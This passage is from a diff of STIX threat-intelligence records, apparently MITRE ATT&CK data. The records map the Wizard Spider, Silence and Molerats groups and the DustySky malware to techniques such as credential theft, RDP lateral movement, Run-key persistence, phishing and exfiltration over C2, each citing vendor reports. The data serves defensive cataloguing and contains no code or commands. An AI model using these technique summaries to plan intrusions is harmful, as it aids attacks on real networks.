+ "id": "relationship--2b5965fe-b178-4c03-91af-942491c79302",
+ "type": "relationship",
+ "modified": "2020-05-13T13:58:12.493Z",
+ "created": "2020-05-13T13:58:12.493Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used stolen credentials to copy tools into the %TEMP% directory of domain controllers.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4f243ab6-812f-4fd3-9607-8d94409a94c1",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.533Z",
+ "created": "2020-05-13T15:28:06.633Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used RDP for lateral movement.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--43fabcba-66b6-45dc-b905-926f0a0a2bba",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.580Z",
+ "created": "2020-05-13T15:28:06.685Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c51d9123-7f7e-41e6-8cf7-7c7dc4170ca0",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.609Z",
+ "created": "2020-05-13T16:45:50.311Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--93cd9a2c-48e3-4a95-90fb-6436afcfa7a8",
+ "type": "relationship",
+ "modified": "2020-05-13T16:45:50.316Z",
+ "created": "2020-05-13T16:45:50.316Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected and staged credentials and network enumeration information, using the networkdll and psfin [TrickBot](https://attack.mitre.org/software/S0266) modules.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2c54816e-5dd1-4723-99f5-29c80a2fc171",
+ "type": "relationship",
+ "modified": "2020-05-13T16:45:50.317Z",
+ "created": "2020-05-13T16:45:50.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) used base64 encoding to obfuscate an [Empire](https://attack.mitre.org/software/S0363) service.(Citation: FireEye Ryuk and Trickbot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5a2c4561-48e4-4d51-8f00-ff470a18df32",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.642Z",
+ "created": "2020-05-13T17:16:11.074Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ },
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used AdFind.exe to enumerate domain computers, including the domain controller.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--df13cae2-4e20-4e89-ae60-6bd8b99e2342",
+ "type": "relationship",
+ "modified": "2020-05-18T21:26:08.307Z",
+ "created": "2020-05-13T17:16:11.123Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used valid credentials for privileged accounts with the goal of accessing domain controllers.(Citation: CrowdStrike Grim Spider May 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--ad06b85a-a0df-41aa-8f45-f41504987918",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.644Z",
+ "created": "2020-05-13T17:16:11.136Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, and the Startup folder to establish persistence.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2d49852d-083e-4379-90e3-dcb0748be624",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.890Z",
+ "created": "2020-05-13T19:06:23.890Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has injected a DLL library containing a Trojan into the fwmain32.exe process.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--28a76700-4834-4a1b-bb56-2005bc044e29",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.909Z",
+ "created": "2020-05-13T19:06:23.909Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used RAdmin, a remote software tool used to remotely control workstations and ATMs.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6fc128ed-90f3-4933-8ad7-4fd4a04cb39f",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.916Z",
+ "created": "2020-05-13T19:06:23.916Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\\Socks5.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--89077d0b-aaa2-48b9-90d7-e253a550bfad",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.919Z",
+ "created": "2020-05-13T19:06:23.919Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used port 444 when sending data about the system from the client to the server.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--01c982c2-f610-443f-ae60-1b4a1f508f81",
+ "type": "relationship",
+ "modified": "2020-05-13T19:06:23.934Z",
+ "created": "2020-05-13T19:06:23.934Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) saved malicious files within the AppData and Startup folders to maintain persistence.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aa4038e3-451f-4ad7-acc7-5c971825967b",
+ "type": "relationship",
+ "modified": "2020-05-14T14:30:09.500Z",
+ "created": "2020-05-13T19:39:41.704Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used executables to download malicious files from different sources.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2fd0b80f-d053-4679-a350-1bb45b32ab49",
+ "type": "relationship",
+ "modified": "2020-05-13T19:39:41.717Z",
+ "created": "2020-05-13T19:39:41.717Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has delivered compressed executables within ZIP files to victims.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--383a50af-eeeb-40e5-b4df-8a1a9c5baa69",
+ "type": "relationship",
+ "modified": "2020-05-14T15:35:08.907Z",
+ "created": "2020-05-13T19:39:41.727Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious links via email.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--21ebcd72-cb89-4d26-82b7-4d17843034c5",
+ "type": "relationship",
+ "modified": "2020-05-14T14:30:09.809Z",
+ "created": "2020-05-13T19:39:41.729Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious files via email.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e586e3c7-ed6b-4f6b-92e8-031f0acc84ef",
+ "type": "relationship",
+ "modified": "2020-05-14T14:30:09.803Z",
+ "created": "2020-05-13T19:39:41.738Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious attachments.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5a9f2571-e611-4f7f-b0c9-6fc2d306b2f6",
+ "type": "relationship",
+ "modified": "2020-05-13T19:39:41.741Z",
+ "created": "2020-05-13T19:39:41.741Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious links included.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7fd1b042-8543-46f7-90d5-631500f17e9e",
+ "type": "relationship",
+ "modified": "2020-05-13T19:39:41.781Z",
+ "created": "2020-05-13T19:39:41.781Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with VBScript, on target machines.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b5ba1f46-0dd0-49f7-9d24-3822153229ba",
+ "type": "relationship",
+ "modified": "2020-06-24T19:11:10.772Z",
+ "created": "2020-05-13T19:39:41.804Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with JS, on target machines.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--cbba2f85-d5f4-4306-a219-5eea6c59dbb6",
+ "type": "relationship",
+ "modified": "2020-06-24T19:11:10.774Z",
+ "created": "2020-05-13T19:39:41.811Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used PowerShell implants on target machines.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b2562bd3-5f78-4bcb-a37b-cae2b415c629",
+ "type": "relationship",
+ "modified": "2020-05-14T14:30:09.879Z",
+ "created": "2020-05-13T19:39:41.842Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) created folders in temp directories to host collected files before exfiltration.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7e7c0aa8-a17e-4079-b1fd-188977cf1a6e",
+ "type": "relationship",
+ "modified": "2020-05-13T19:59:39.312Z",
+ "created": "2020-05-13T19:59:39.312Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) has exfiltrated data to the C2 server.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5434447a-d954-4106-9657-ee62a4acf27b",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:34.060Z",
+ "created": "2020-05-13T19:59:39.327Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) can compress files via RAR while staging data to be exfiltrated.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--51300de6-0f80-45dc-92f7-f48dbc887d8c",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:34.267Z",
+ "created": "2020-05-13T19:59:39.331Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) captures PNG screenshots of the main screen.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a724a449-cd4d-419a-90a0-cdd5927c60b7",
+ "type": "relationship",
+ "modified": "2020-05-13T19:59:39.334Z",
+ "created": "2020-05-13T19:59:39.334Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
